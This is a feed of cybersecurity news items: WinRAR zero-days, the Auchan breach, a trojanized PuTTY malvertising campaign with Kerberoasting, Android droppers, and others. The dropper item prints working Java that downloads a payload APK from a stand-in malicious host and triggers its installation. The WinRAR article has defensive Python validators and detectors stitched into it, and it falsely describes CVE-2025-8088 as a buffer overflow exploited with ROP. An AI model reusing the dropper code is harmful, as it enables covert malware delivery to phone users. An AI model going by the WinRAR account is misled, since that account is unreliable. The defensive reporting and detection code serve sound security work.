• A new large-scale campaign has been observed exploiting over 100 compromised WordPress sites to direct site visitors to fake CAPTCHA verification pages that employ the ClickFix social engineering tactic to deliver information stealers, ransomware, and cryptocurrency miners. The large-scale cybercrime campaign, first detected in August 2025, has been codenamed ShadowCaptcha by the Israel National

  • The cybersecurity landscape has been significantly impacted by the discovery and active exploitation of two critical zero-day vulnerabilities in WinRAR, one of the world’s most widely used file compression utilities. 

    CVE-2025-6218 and CVE-2025-8088 represent sophisticated attack vectors that have enabled threat actors to achieve remote code execution and establish persistent access to compromised systems through maliciously crafted archive files.

    These vulnerabilities, with CVSS scores of 8.8 and 7.8, respectively, demonstrate the critical importance of maintaining updated compression software and implementing robust security measures around file handling processes.

    The exploitation of these vulnerabilities has been observed across multiple threat campaigns, affecting both individual users and enterprise environments, highlighting the urgent need for comprehensive vulnerability management and user awareness programs.

    WinRAR 0-Day Vulnerabilities

    WinRAR, developed by win.rar GmbH, has maintained its position as a dominant force in the file compression software market for over two decades, with an estimated user base exceeding 500 million installations worldwide.

    The software’s ubiquity across personal and corporate environments has made it an attractive target for cybercriminals seeking to exploit fundamental weaknesses in archive processing mechanisms.

    The emergence of CVE-2025-6218 and CVE-2025-8088 represents a significant escalation in the sophistication of attacks targeting compression software, moving beyond traditional social engineering tactics to leverage deep technical vulnerabilities in the application’s core functionality.

    The architectural design of WinRAR’s extraction engine, which processes complex archive structures and metadata, has historically presented numerous attack surfaces for malicious actors.

    These vulnerabilities specifically target the filename parsing routines and path traversal protection mechanisms that are fundamental to secure archive extraction.

    The discovery of these vulnerabilities coincided with increased threat actor interest in supply chain attacks and living-off-the-land techniques, making WinRAR an ideal vector for initial access and lateral movement within target networks.

    Modern threat landscapes have demonstrated that compression software vulnerabilities can serve as powerful enablers for multi-stage attack campaigns, allowing adversaries to bypass traditional security controls while maintaining a low detection profile.

    The integration of these exploits into advanced persistent threat (APT) toolkits and commodity malware families has amplified their impact, creating cascading security incidents across multiple industry sectors.

    The technical complexity of these vulnerabilities also presents significant challenges for detection and mitigation, requiring organizations to implement comprehensive monitoring and response capabilities.

    WinRAR Exploit Flow.

    Technical Breakdown of the Vulnerabilities

    CVE-2025-6218 represents a critical path traversal vulnerability within WinRAR’s archive extraction functionality, characterized by insufficient validation of file paths during the decompression process.

    This vulnerability enables attackers to craft malicious RAR archives containing specially formatted filenames that can escape the intended extraction directory and write arbitrary files to sensitive system locations.

    The vulnerability operates by exploiting weaknesses in the path normalization routines, allowing the use of directory traversal sequences (../) that bypass existing security controls and enable unauthorized file system access.

    The technical implementation of CVE-2025-6218 centers around the manipulation of archive headers and filename entries that are processed during extraction.

    Attackers leverage Unicode encoding techniques and null byte injection to create filenames that appear legitimate to initial validation routines but are interpreted differently during the actual file creation process.

    This discrepancy allows malicious files to be written to critical system directories such as the Windows startup folder, system32 directory, or user profile locations, enabling immediate or persistent code execution upon system restart or user login.
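    The defensive counterpart to the traversal tricks described above is to validate every archive entry name before any file is created. The following validator is an added example, not code from the article or from WinRAR; it rejects embedded NUL bytes, look-alike Unicode forms, backslash separators, absolute and drive-letter paths, and `..` components, and then confirms the resolved path still lies inside the destination directory. The destination paths and entry names in the checks are constructed.

```python
import os
import unicodedata


class UnsafeEntryError(ValueError):
    """Raised when an archive entry name would escape the extraction directory."""


def _check_components(name: str) -> list[str]:
    """Split a slash-separated name and reject traversal or absolute forms."""
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        raise UnsafeEntryError("absolute or drive-relative path in entry name")
    parts = [p for p in name.split("/") if p not in ("", ".")]
    if not parts:
        raise UnsafeEntryError("empty entry name")
    # Fail closed: even 'sub/../file' (which would stay inside) is rejected,
    # because a legitimate archiver never needs to emit '..' components.
    if any(p == ".." for p in parts):
        raise UnsafeEntryError("parent-directory traversal in entry name")
    return parts


def resolve_entry_path(dest_dir: str, entry_name: str) -> str:
    """Return the absolute on-disk path an entry may be written to, or raise."""
    # A NUL byte lets a name look harmless to a string validator while the
    # C-level file API truncates it at the NUL.
    if "\x00" in entry_name:
        raise UnsafeEntryError("NUL byte in entry name")
    # Windows extractors treat backslashes as separators; normalise first.
    name = unicodedata.normalize("NFC", entry_name).replace("\\", "/")
    # Run the component checks on the NFKC form too, so compatibility
    # look-alikes of '.' cannot slip past the comparison.
    for candidate in (name, unicodedata.normalize("NFKC", name)):
        _check_components(candidate)
    parts = _check_components(name)
    base = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(base, *parts))
    # Authoritative check: the resolved target must stay under the base.
    if os.path.commonpath([base, target]) != base:
        raise UnsafeEntryError("entry resolves outside destination")
    return target


def is_safe_entry(dest_dir: str, entry_name: str) -> bool:
    try:
        resolve_entry_path(dest_dir, entry_name)
        return True
    except UnsafeEntryError:
        return False


def audit_entries(dest_dir: str, entry_names) -> dict:
    """Map each rejected entry name to the reason it was rejected."""
    rejected = {}
    for name in entry_names:
        try:
            resolve_entry_path(dest_dir, name)
        except UnsafeEntryError as exc:
            rejected[name] = str(exc)
    return rejected


if __name__ == "__main__":
    # Constructed entry names modelled on the traversal patterns above.
    names = [
        "docs/readme.txt",
        "../../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/x.exe",
        "..\\..\\Windows\\System32\\evil.dll",
        "notes.txt\x00../../evil.exe",
        "C:\\Windows\\System32\\evil.dll",
    ]
    for entry, reason in audit_entries("/tmp/out", names).items():
        print(f"REJECT {entry!r}: {reason}")
```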

    CVE-2025-8088 presents a complementary attack vector through a buffer overflow vulnerability in WinRAR’s filename parsing engine. This vulnerability occurs when the application processes archive entries with exceptionally long filenames or malformed Unicode sequences, causing memory corruption that can be leveraged to achieve arbitrary code execution.

    The vulnerability manifests during the initial parsing phase of archive processing, before any user interaction or security warnings are displayed, making it particularly dangerous for automated extraction scenarios or when email security gateways process archives.

    The exploitation mechanism for CVE-2025-8088 involves careful manipulation of heap memory structures and return-oriented programming (ROP) techniques to bypass modern memory protection mechanisms such as Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP).

    Successful exploitation results in the attacker gaining the same privilege level as the WinRAR process, typically enabling full user-level access to the compromised system. When combined with CVE-2025-6218, these vulnerabilities create a powerful attack chain that provides both immediate code execution and persistent system access.

    WinRAR CVE-2025-8088 via RAR file delivering a malicious LNK file. (Source: ESET)

    The initial discovery of these vulnerabilities emerged from security research conducted by multiple independent security firms during routine analysis of file format handling in popular compression software.

    The research methodology involved comprehensive fuzzing operations against WinRAR’s parsing engines, utilizing both mutation-based and generation-based fuzzing techniques to identify edge cases in filename processing and archive structure validation.

    Initial indicators of the vulnerabilities surfaced when researchers observed abnormal memory consumption patterns and unexpected file system operations during controlled extraction tests.

    The first confirmed exploitation attempts were detected in early 2025 through advanced threat detection platforms monitoring for unusual file system activities associated with archive extraction processes.

    Threat intelligence analysts identified a correlation between suspicious RAR file attachments in targeted phishing campaigns and subsequent indicators of compromise on victim systems.

    These initial detections revealed a sophisticated attack infrastructure utilizing dynamic DNS services and compromised legitimate websites to host malicious archive files disguised as software updates, document collections, and media files.

    Detailed forensic analysis of captured exploit samples revealed the technical sophistication employed by threat actors in weaponizing these vulnerabilities.

    The malicious archives demonstrated advanced anti-analysis techniques, including the use of password protection, nested archive structures, and decoy files designed to evade automated security scanning systems.

    Researchers discovered that successful exploitation campaigns employed social engineering themes related to current events, software updates, and business communications to increase the likelihood of user interaction with malicious archives.

    The attack infrastructure supporting these exploitation campaigns exhibited characteristics consistent with organized cybercriminal operations, featuring redundant command and control networks, cryptocurrency-based payment systems, and sophisticated victim targeting mechanisms.

    Analysis of network telemetry data revealed that successful compromises were followed by rapid lateral movement activities, credential harvesting operations, and deployment of secondary malware payloads designed to establish long-term persistence and facilitate data exfiltration.

    Detection and Indicators of Compromise (IoCs)

    Comprehensive detection of CVE-2025-6218 and CVE-2025-8088 exploitation requires implementation of multi-layered monitoring strategies that encompass file system operations, network communications, and process execution patterns.

    Security teams should focus on detecting anomalous file creation activities outside standard application directories, particularly focusing on writes to system folders, startup locations, and user profile directories that occur during or immediately after archive extraction processes. 

    File integrity monitoring systems should be configured to alert on unexpected modifications to critical system files, especially DLL files in application directories that may indicate hijacking attempts.

    Network-based detection mechanisms should monitor for unusual DNS queries and HTTP/HTTPS connections initiated shortly after archive file processing, particularly focusing on connections to recently registered domains, dynamic DNS services, and IP addresses with poor reputation scores. 

    Behavioral analysis engines should correlate archive extraction events with subsequent network activity to identify potential command and control communications.

    Security information and event management (SIEM) systems should implement rules to detect the temporal correlation between WinRAR process execution and suspicious network connections or file system modifications.

    Endpoint detection and response (EDR) solutions should be configured to monitor for specific process execution patterns associated with these exploits, including the creation of child processes from WinRAR, unusual DLL loading activities, and registry modifications related to persistence mechanisms.

    Critical indicators include the execution of processes from temporary directories, PowerShell or CMD executions initiated by compression software, and the creation of scheduled tasks or startup entries during archive processing operations.

    Organizations should implement proactive threat hunting activities focused on identifying historical indicators of compromise that may have evaded initial detection systems.
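    The indicators listed above (writes into startup or system folders during extraction, interpreters spawned by WinRAR, executables launched from temporary directories) can be expressed as correlation rules over endpoint telemetry. The detector below is an added example, not code from the article or any vendor; it runs over a constructed set of process-creation and file-creation events and returns the matching findings.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Child processes an archive utility has no business launching.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe",
                "mshta.exe", "wscript.exe", "cscript.exe", "regsvr32.exe"}
# Directory fragments (forward slashes, lower-case) where extraction should never land.
SENSITIVE_DIRS = ("/microsoft/windows/start menu/programs/startup/",
                  "/windows/system32/", "/windows/temp/")
EXEC_EXT = (".exe", ".dll", ".lnk", ".scr", ".bat", ".ps1", ".vbs", ".js")


@dataclass
class Event:
    ts: datetime
    kind: str            # "process" (creation) or "file" (creation)
    image: str           # acting process image path
    parent: str = ""     # parent image, for process events
    target: str = ""     # created file path, for file events
    cmdline: str = ""


def norm(path: str) -> str:
    return path.replace("\\", "/").lower()


def basename(path: str) -> str:
    return norm(path).rsplit("/", 1)[-1]


def detect(events, window=timedelta(minutes=5)):
    """Return (timestamp, rule, detail) tuples for suspicious activity."""
    findings = []
    last_winrar = None  # most recent WinRAR activity seen on this host
    for e in sorted(events, key=lambda ev: ev.ts):
        if basename(e.image) == "winrar.exe":
            last_winrar = e.ts
        recent = last_winrar is not None and e.ts - last_winrar <= window
        if e.kind == "process":
            child = basename(e.image)
            if basename(e.parent) == "winrar.exe" and child in INTERPRETERS:
                findings.append((e.ts, "winrar_spawned_interpreter",
                                 f"{child} {e.cmdline}".strip()))
            elif recent and "/temp/" in norm(e.image) and child.endswith(EXEC_EXT):
                findings.append((e.ts, "exec_from_temp_after_extraction", e.image))
        elif e.kind == "file":
            t = norm(e.target)
            if (basename(e.image) == "winrar.exe" and t.endswith(EXEC_EXT)
                    and any(d in t for d in SENSITIVE_DIRS)):
                findings.append((e.ts, "extraction_write_to_sensitive_dir", e.target))
    return findings


def sample_events():
    """Constructed telemetry: one extraction that drops a startup binary,
    spawns cmd.exe and then runs a staged executable from a temp directory."""
    t0 = datetime(2025, 8, 20, 10, 0, 0)
    winrar = r"C:\Program Files\WinRAR\WinRAR.exe"
    return [
        Event(t0, "process", winrar, parent=r"C:\Windows\explorer.exe"),
        Event(t0 + timedelta(seconds=5), "file", winrar,
              target=r"C:\Users\victim\Downloads\invoice\report.pdf"),
        Event(t0 + timedelta(seconds=6), "file", winrar,
              target=r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.exe"),
        Event(t0 + timedelta(seconds=20), "process", r"C:\Windows\System32\cmd.exe",
              parent=winrar, cmdline="cmd.exe /c start updater.exe"),
        Event(t0 + timedelta(minutes=1), "process", r"C:\Windows\Temp\rar_extract\stage2.exe",
              parent=r"C:\Windows\System32\cmd.exe"),
        # Benign: an unrelated cmd.exe two hours later, not tied to any extraction.
        Event(t0 + timedelta(hours=2), "process", r"C:\Windows\System32\cmd.exe",
              parent=r"C:\Windows\explorer.exe", cmdline="cmd.exe"),
    ]


def run_sample():
    return detect(sample_events())


if __name__ == "__main__":
    for ts, rule, detail in run_sample():
        print(ts.isoformat(), rule, detail)
```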


    The comprehensive threat landscape surrounding CVE-2025-6218 and CVE-2025-8088 demonstrates the evolving sophistication of attacks targeting fundamental software components. It highlights the critical importance of maintaining current security practices around file handling and compression software management.

    Organizations must implement robust detection capabilities, maintain updated software versions, and educate users about the risks associated with processing untrusted archive files to mitigate these emerging threats effectively.


    The post WinRAR 0-Day Vulnerabilities Exploited in Wild by Hackers – Detailed Case Study appeared first on Cyber Security News.

  • Major French retail chain Auchan announced on August 21, 2025, that it suffered a significant cybersecurity incident resulting in the unauthorized access and theft of personal data from “several hundred thousand” customer loyalty accounts. 

    The breach represents another critical example of retail sector vulnerabilities to Advanced Persistent Threats (APTs) targeting customer databases containing Personally Identifiable Information (PII).

    Key Takeaways
    1. Auchan confirmed a cyberattack exposing customer data.
    2. Database attack stopped by segmentation.
    3. Customers notified, CNIL alerted, phishing warning issued.

    Customer Personal Data Compromised

    Le Monde reports that the cyberattack compromised multiple data fields within Auchan’s customer relationship management system, including first and last names, email addresses, postal addresses, telephone numbers, and loyalty card numbers. 

    Security analysts note that this data profile suggests attackers gained access to the retailer’s Customer Loyalty Management (CLM) database, likely through SQL injection vulnerabilities or privileged account compromise.

    Notably, Auchan confirmed that financial data, authentication credentials (passwords), loyalty card PIN codes, and customer reward balances remained secure, indicating the breach was contained to specific database tables rather than achieving full system compromise. 

    This suggests the implementation of a defense-in-depth architecture with data segmentation protocols that prevent lateral movement to more sensitive systems.

    The attack methodology appears consistent with data harvesting operations commonly executed by cybercriminal groups targeting retail Point-of-Sale (POS) networks and customer databases for subsequent credential stuffing attacks or Business Email Compromise (BEC) campaigns.

    Auchan’s Response 

    Auchan immediately initiated incident response protocols, notifying affected customers and filing mandatory breach reports with France’s Commission Nationale de l’Informatique et des Libertés (CNIL). 

    The company warned customers about increased phishing risks, specifically smishing (SMS phishing) and email-based social engineering attacks exploiting the stolen contact information.

    This incident marks Auchan’s second major cybersecurity breach within nine months, following a similar attack in November 2024. 

    The repeated targeting suggests threat actors may have maintained persistent access or identified systemic vulnerabilities within the retailer’s infrastructure. 

    Security researchers recommend implementing Zero Trust Architecture (ZTA), Multi-Factor Authentication (MFA), and enhanced Security Information and Event Management (SIEM) monitoring to prevent future intrusions.

    The attack aligns with France’s challenging cybersecurity landscape in 2025, which has witnessed major breaches, including the Bouygues Telecom incident affecting over six million customers with compromised banking details. 

    These incidents underscore the critical need for enhanced threat intelligence sharing and proactive vulnerability management across France’s retail and telecommunications sectors.


    The post French Retailer Auchan Cyberattack – Thousands of Customers Personal Data Exposed appeared first on Cyber Security News.

  • Google Threat Intelligence Group (GTIG) has uncovered a multifaceted cyber espionage operation attributed to the PRC-nexus threat actor UNC6384, believed to be associated with TEMP.Hex (also known as Mustang Panda). This campaign, aligned with China’s strategic interests, primarily targeted diplomats in Southeast Asia alongside global entities, employing advanced tactics such as adversary-in-the-middle (AitM) attacks, captive […]

    The post Chinese UNC6384 Hackers Use Valid Code-Signing Certificates to Evade Detection appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • A comprehensive analysis of the top 10 social media platforms reveals that X (formerly Twitter) stands out as the most invasive collector of user location information, gathering both precise and coarse location data across all categories listed in Apple’s App Store privacy framework. 

    This extensive data harvesting raises significant privacy concerns as location tracking can expose intimate details about users’ personal and professional lives.

    Key Takeaways
    1. X collects both precise and coarse location data for every use case.
    2. Location tracking can uncover sensitive personal details.
    3. Only Reddit avoids identity linkage; mitigate via disabling services, VPNs, and permission audits.

    Location Data Harvesting 

    Unlike its competitors, X collects location data for every possible purpose outlined in App Store privacy policies. 

    The platform gathers both precise location data (coordinates with three or more decimal places in latitude and longitude) and coarse location data with lower resolution.

    This comprehensive approach includes third-party advertising, internal marketing, analytics, product personalization, app functionality, user tracking, and unspecified “other purposes.”

    A visual breakdown highlighting how various social media platforms, including X, collect users’ precise location data for multiple purposes. (Source: Surfshark)

    The study reveals that 60% of analyzed social media platforms collect precise location data for third-party advertising, including X, Instagram, Threads, Facebook, Pinterest, and Snapchat.

    However, X’s approach extends beyond advertising into tracking territory, where it may combine location information with data from other applications or websites. This practice potentially enables data sharing with data brokers who can subsequently sell user information to third-party businesses.

    Surfshark reports that the location tracking methodologies employed by these platforms utilize various geolocation vectors including Global Positioning System (GPS) coordinates, Bluetooth Low Energy (BLE) beacons, Wi-Fi access point triangulation, cellular tower positioning, and Internet Protocol (IP) address geolocation. 

    Even when users disable precise location sharing through system settings, platforms can still derive approximate locations through these alternative data sources.

    The privacy implications of aggressive location tracking extend far beyond simple geographical awareness. 

    Continuous location monitoring at 30-minute intervals can construct detailed behavioral profiles revealing employment locations, salary brackets inferred from workplace addresses, medical conditions through healthcare facility visits, and potentially compromising personal relationships through overnight location correlations.

    Among the analyzed platforms, only Reddit implements user-centric privacy protections by declaring that location data will not be linked to user identity. 

    TikTok and Reddit demonstrate more conservative approaches by exclusively collecting coarse location data rather than precise coordinates. 

    In contrast, X’s comprehensive data collection strategy encompasses both precision levels across all functional categories.

    The study methodology examined App Store privacy labels for X, Instagram, Threads, Facebook, Pinterest, Snapchat, LinkedIn, TikTok, YouTube, and Reddit as of August 11, 2025. 

    While 90% of platforms collect coarse location data and 60% gather precise coordinates for internal advertising purposes, X’s universal collection approach represents the most extensive location data harvesting among major social media applications.

    Technical mitigation strategies for users include disabling location services at the operating system level, utilizing Virtual Private Network (VPN) services to mask IP-based geolocation, and regularly auditing app permissions through system privacy settings. 

    However, complete location privacy remains challenging given the multiple data vectors available to determined platforms.


    The post X/Twitter The Most Aggressive Social Media App Collecting Users Location Information appeared first on Cyber Security News.

  • Maryland’s transit network experienced widespread disruption this week after a sophisticated cyberattack targeted critical information systems, forcing the Maryland Transit Administration (MTA) and the Department of Information Technology (DoIT) to scramble containment efforts. While most core services remain operational, significant impacts to scheduling and real-time information have left thousands of commuters seeking alternative arrangements. DoIT […]

    The post Maryland Transportation Systems Disrupted Following Cyberattack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Cybersecurity researchers have discovered a new variant of an Android banking trojan called HOOK that features ransomware-style overlay screens to display extortion messages. “A prominent characteristic of the latest variant is its capacity to deploy a full-screen ransomware overlay, which aims to coerce the victim into remitting a ransom payment,” Zimperium zLabs researcher Vishnu Pratapagiri

  • A malvertising campaign using sponsored results on Microsoft’s search platform delivered a weaponized PuTTY that established persistence, enabled hands-on keyboard control, and executed Kerberoasting to target Active Directory service accounts.

    The findings come from an investigation published by LevelBlue’s MDR SOC, corroborated by independent research tracking Oyster/Broomstick backdoor activity tied to trojanized admin tools distributed via search ads and SEO poisoning.

    Search results highlight a sponsored link for downloading PuTTY, illustrating the malvertising tactics used in the campaign.

    LevelBlue’s SOC received a SentinelOne high-risk alert in USM Anywhere, flagging a suspicious PuTTY.exe download signed by “NEW VISION MARKETING LLC,” an unexpected signer for legitimate PuTTY and the first red flag on the endpoint.

    The analysis highlighted outbound traffic from PuTTY.exe to malicious infrastructure, suspicious DLL creation in %appdata% and %temp%, scheduled-task persistence via rundll32 DllRegisterServer, and hands-on-keyboard (HOK) activity culminating in Kerberoasting.

    Next, the asset was isolated, the account was disabled, and execution chains were reconstructed. This revealed that the fake installer had scheduled a task, “Security Updater,” to run every three minutes, loading a malicious DLL (twain_96.dll). This DLL then dropped “green.dll,” which was used for operator access and reconnaissance.

    Weaponized PuTTY to Exploit Kerberos

    The fake PuTTY, carrying an anomalous code-signing certificate, executed and established scheduled-task persistence, invoking rundll32 with DllRegisterServer at three-minute intervals.

    The first-stage DLL (twain_96[.]dll) dropped a second-stage (green[.]dll) that initiated a single outbound 443 connection and spawned cmd[.]exe for discovery commands consistent with ransomware operator TTPs (nltest, net group domain admins, nltest /dclist).

    SentinelOne telemetry and VirusTotal classifications mapped the DLLs to the Oyster/Broomstick backdoor family known for hardcoded C2, scheduled-task persistence, and remote command execution.

    The final recorded action was an inline PowerShell script performing Kerberoasting, requesting TGS tickets for SPN-bearing accounts and leveraging weak RC4-HMAC if AES enforcement was absent, then extracting ticket bytes in-memory to emit Hashcat-ready $krb5tgs$ material (mode 13100).

    PowerShell script showcasing a command execution bypass designed for Kerberoasting

    The script borrowed from Invoke-Kerberoast patterns, executed fully in-memory without disk writes, and was validated via USM Anywhere events showing RC4-HMAC-encrypted Kerberos service tickets (Event ID 4769). This enabled offline cracking of service account credentials for privilege escalation and lateral movement against AD services.
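    The Event ID 4769 telemetry mentioned above is what a detection engineer would key on: one requester obtaining RC4-HMAC (encryption type 0x17) service tickets for many distinct service accounts in a short burst. The detector below is an added example, not code from the article or LevelBlue; it assumes a constructed key=value export of 4769 fields (TargetUserName as `user`, ServiceName as `service`, TicketEncryptionType as `etype`) and the sample lines are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Ticket encryption types that are practical to crack offline:
# 0x1 DES-CBC-CRC, 0x3 DES-CBC-MD5, 0x17 RC4-HMAC, 0x18 RC4-HMAC-EXP.
WEAK_ETYPES = {"0x1", "0x3", "0x17", "0x18"}


def parse_4769(line: str) -> dict:
    """Parse one constructed 'key=value' export line of a 4769 event."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    return {
        "ts": datetime.fromisoformat(fields["ts"]),
        "user": fields["user"],            # TargetUserName: who requested the TGS
        "service": fields["service"],      # ServiceName: account owning the SPN
        "etype": fields["etype"].lower(),  # TicketEncryptionType
        "ip": fields.get("ip", ""),
    }


def detect_kerberoasting(events, window=timedelta(seconds=60), threshold=5):
    """Flag requesters that obtain weakly encrypted service tickets for at
    least `threshold` distinct service accounts within `window`."""
    by_user = defaultdict(list)
    for e in events:
        if e["etype"] not in WEAK_ETYPES:
            continue
        svc = e["service"]
        # Computer accounts and krbtgt have long random keys: noise, not crackable.
        if svc.endswith("$") or svc.lower().startswith("krbtgt"):
            continue
        by_user[e["user"]].append(e)

    findings = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            services = {x["service"] for x in evs[i:]
                        if x["ts"] - first["ts"] <= window}
            if len(services) >= threshold:
                findings.append({"user": user, "ip": first["ip"], "start": first["ts"],
                                 "distinct_services": len(services),
                                 "services": sorted(services)})
                break  # one finding per requester is enough for triage
    return findings


# Constructed sample: jdoe roasts six SPN accounts in seven seconds (plus one
# computer account that the rule ignores); asmith requests a single RC4 ticket;
# admin requests five AES256 (0x12) tickets, which are not crackable offline.
SAMPLE_LOG = """\
ts=2025-08-20T09:12:00 user=jdoe service=svc_sql etype=0x17 ip=10.0.5.23
ts=2025-08-20T09:12:01 user=jdoe service=svc_web etype=0x17 ip=10.0.5.23
ts=2025-08-20T09:12:01 user=jdoe service=WS01$ etype=0x17 ip=10.0.5.23
ts=2025-08-20T09:12:02 user=jdoe service=svc_backup etype=0x17 ip=10.0.5.23
ts=2025-08-20T09:12:03 user=jdoe service=svc_sharepoint etype=0x17 ip=10.0.5.23
ts=2025-08-20T09:12:04 user=jdoe service=svc_exchange etype=0x17 ip=10.0.5.23
ts=2025-08-20T09:12:07 user=jdoe service=svc_sccm etype=0x17 ip=10.0.5.23
ts=2025-08-20T09:15:00 user=asmith service=svc_sql etype=0x17 ip=10.0.5.40
ts=2025-08-20T09:20:00 user=admin service=svc_sql etype=0x12 ip=10.0.5.9
ts=2025-08-20T09:20:01 user=admin service=svc_web etype=0x12 ip=10.0.5.9
ts=2025-08-20T09:20:02 user=admin service=svc_backup etype=0x12 ip=10.0.5.9
ts=2025-08-20T09:20:03 user=admin service=svc_sharepoint etype=0x12 ip=10.0.5.9
ts=2025-08-20T09:20:04 user=admin service=svc_exchange etype=0x12 ip=10.0.5.9
"""


def run_sample():
    events = [parse_4769(line) for line in SAMPLE_LOG.splitlines() if line.strip()]
    return detect_kerberoasting(events)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f['user']} from {f['ip']} at {f['start'].isoformat()}: "
              f"{f['distinct_services']} weak TGS tickets -> {f['services']}")
```

    Enforcing AES on SPN-bearing accounts, as the recommendations below state, removes the 0x17 tickets this rule keys on, so the same log should then show no findings.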

    LevelBlue traced the initial access to malicious sponsored results impersonating putty[.]org and redirecting to typosquatted domains such as puttyy[.]org and puttysystems[.]com that delivered the trojanized installer, with payload hosting observed via heartlandenergy[.]ai and a rotating loader script at putty[.]network pulling from compromised WordPress sites.

    The MDR team noted variant payload hashes, multiple code-signing certificates (including NEW VISION MARKETING LLC) to evade hash/signer-based detections, and alternate scheduled-task names such as “FireFox Agent INC” in sandboxed samples.

    This activity aligns with broader 2024–2025 malvertising/SEO poisoning trends delivering trojanized PuTTY/WinSCP and Oyster/Broomstick, as reported by Rapid7 and Arctic Wolf.

    LevelBlue’s investigation into the weaponized PuTTY malvertising tied to the Oyster/Broomstick backdoor produced a consolidated set of IOCs covering domains, file hashes, code signers, IPs, URLs, and scheduled-task names, drawn from LevelBlue’s own documentation and aligned open-source reporting on the same campaign. Use these indicators for blocklists, retro-hunting, and detection content.


    Recommendations include blocking the identified domains, enforcing AES for Kerberos on SPN accounts, rotating credentials for affected SPNs, and restricting software acquisition to vetted repositories and official vendor sites.

    Security teams should deploy custom detections for rundll32 DllRegisterServer misuse, three-minute recurring scheduled tasks, in-memory Kerberoasting patterns, and storyline correlations linking fake admin tools to DLL drops and cmd[.]exe reconnaissance.

    Continuous user training for privileged staff and rapid MDR-led threat hunting across fleets can reduce dwell time and blunt credential theft-to-ransomware escalation paths.


    The post Weaponized PuTTY Via Bing Ads Exploit Kerberos and Attack Active Directory Services appeared first on Cyber Security News.


  • A comprehensive study examining the location data practices of the top 10 social media platforms has uncovered concerning patterns of user tracking that extend far beyond what most users realize. The research, which analyzed App Store disclosures from major platforms including X, Instagram, Facebook, TikTok, and others, reveals that X stands out as the most aggressive […]

    The post X/Twitter Found to Be Most Aggressive Social Media App in Tracking User Location Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Android droppers have evolved from niche installers for heavyweight banking Trojans into universal delivery frameworks, capable of deploying even rudimentary spyware or SMS stealers.

    Initially, droppers served banking malware families that required elevated Accessibility permissions to harvest credentials.

    These small applications appeared innocuous at first glance, often masquerading as utility or government apps in high-risk regions. Once installed, they would fetch their true payload, request powerful permissions, and activate their malicious routines.

    As defenders strengthened pre-installation scanning, threat actors began rethinking their approach.

    In recent months, a surge in dropper-based campaigns targeting Asia—particularly India and Southeast Asia—has emerged. Rather than rely solely on complex RATs or financial Trojans, adversaries now encapsulate simple payloads within dropper shells.

    This strategy exploits a critical gap in Google Play Protect’s Pilot Program, which performs a pre-installation permission and API scan but allows installation to proceed if the user confirms.

    Threat Fabric analysts noted that this pivot not only circumvents upfront defenses but also future-proofs operations, enabling rapid payload swaps without modifying the dropper itself.

    By embedding minimalist stage-one code that carries no high-risk permissions, modern droppers slip through Pilot Program inspections undetected.

    RewardDropMiner (Source – Threat Fabric)

    Threat Fabric researchers identified variants like RewardDropMiner.B, stripped of its Monero miner and fallback spyware, retaining only the dropper logic to reduce noise and evade detection.

    Apps requesting malicious permissions blocked (Source – Threat Fabric)

    Once the benign “update” prompt is accepted by a user, a concealed routine fetches or decrypts the secondary APK, which asks for RECEIVE_SMS or notification-listener access (BIND_NOTIFICATION_LISTENER_SERVICE) only upon first launch of the true payload.

    The impact of these campaigns is twofold: defenders lose early visibility into malicious activity, and operators maintain a stable foothold capable of delivering arbitrary payloads.

    This modularity allows threat actors to react swiftly to security updates or law enforcement takedowns by uploading new payloads behind an unchanged dropper shell hosted on their command-and-control infrastructure.

    Infection Mechanism and Evasion Tactics

    Delving into the infection mechanism reveals a multi-stage process designed for stealth and resiliency. The dropper’s manifest declares only INTERNET and REQUEST_INSTALL_PACKAGES permissions, avoiding flags in Play Protect’s Pilot scan.

    Upon user interaction with the “update” interface, the dropper initiates an HTTPS request to a remote server:

    import java.io.File;
    import java.io.FileOutputStream;
    import java.io.IOException;
    import android.content.Intent;
    import androidx.core.content.FileProvider;
    import okhttp3.OkHttpClient;
    import okhttp3.Request;
    import okhttp3.Response;

    // Invoked from the "update" button handler on a background thread (Android
    // throws NetworkOnMainThreadException for network I/O on the UI thread).
    void fetchAndInstallPayload() throws IOException {
        String payloadUrl = "https://malicious.example.com/payload.apk";
        OkHttpClient client = new OkHttpClient();
        Request request = new Request.Builder().url(payloadUrl).build();
        try (Response response = client.newCall(request).execute()) {
            if (!response.isSuccessful()) {
                return;
            }
            // Stage two lands in app-private external storage, which needs no storage permission
            File apk = new File(getExternalFilesDir(null), "payload.apk");
            try (FileOutputStream fos = new FileOutputStream(apk)) {
                fos.write(response.body().bytes());
            }
            // Hand the APK to the system package installer; this is the only step that
            // needs REQUEST_INSTALL_PACKAGES, and the installer dialog is all the user sees
            Intent installIntent = new Intent(Intent.ACTION_VIEW);
            installIntent.setDataAndType(
                FileProvider.getUriForFile(this, getPackageName() + ".provider", apk),
                "application/vnd.android.package-archive"
            );
            installIntent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
            startActivity(installIntent);
        }
    }

    This snippet exemplifies the dropper’s use of standard APIs (OkHttp, FileProvider and the ACTION_VIEW installer intent) to download and prompt installation of the payload without triggering high-risk permission alerts; the FileProvider authority passed to getUriForFile must be declared in the dropper’s own manifest, which is ordinary for any app that shares files and raises no flag of its own.

    After installation, the payload’s launcher activity requests RECEIVE_SMS and notification-listener access (BIND_NOTIFICATION_LISTENER_SERVICE), at which point Play Protect may warn the user, but often too late, as the trust placed in the initial dropper extends to the newly installed app.

    These evasion tactics highlight a pressing need for defenders to correlate pre- and post-install scans and to monitor side-loaded application behavior continuously.
